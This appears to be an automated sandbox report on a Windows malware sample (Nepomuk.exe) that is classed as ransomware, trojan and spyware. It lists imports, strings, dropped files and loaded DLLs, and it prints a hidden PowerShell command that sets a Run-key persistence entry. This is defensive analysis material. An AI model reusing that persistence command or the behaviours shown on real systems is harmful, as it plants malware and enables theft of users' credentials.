                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C098010_2_032C0980
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E098013_2_012E0980
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: String function: 03569520 appears 88 times
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: String function: 01568920 appears 88 times
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: String function: 0155A1F0 appears 76 times
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: String function: 0355ADF0 appears 40 times
                    Source: Nepomuk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Nepomuk.exeStatic PE information: Section: .data ZLIB complexity 0.9996369551512968
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@14/10@5/11
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 GetSystemInfo,GlobalMemoryStatusEx,GetTickCount,GetTickCount,Sleep,GetTickCount,CreateToolhelp32Snapshot,Process32First,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Process32Next,CloseHandle,0_2_00EF2380
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_035917E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_035917E0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeJump to behavior
                    Source: Nepomuk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Nepomuk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Nepomuk.exe, 00000000.00000003.1293800795.0000000003F1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Nepomuk.exeVirustotal: Detection: 48%
                    Source: Nepomuk.exeReversingLabs: Detection: 52%
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: ypl0SgV/addrselect.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: UCnSf0Mr7N/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: FNxKTCH/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: ypl0SgV/addrselect.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: UCnSf0Mr7N/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: FNxKTCH/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: /stopping/other:secondsuser arena span is on the wrong listruntime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required fo
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: ypl0SgV/addrselect.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: UCnSf0Mr7N/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: FNxKTCH/addr.go
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeString found in binary or memory: seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile read: C:\Users\user\Desktop\Nepomuk.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Nepomuk.exe "C:\Users\user\Desktop\Nepomuk.exe"
                    Source: C:\Users\user\Desktop\Nepomuk.exeProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Nepomuk.exeProcess created: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"Jump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeSection loaded: dpapi.dllJump to behavior
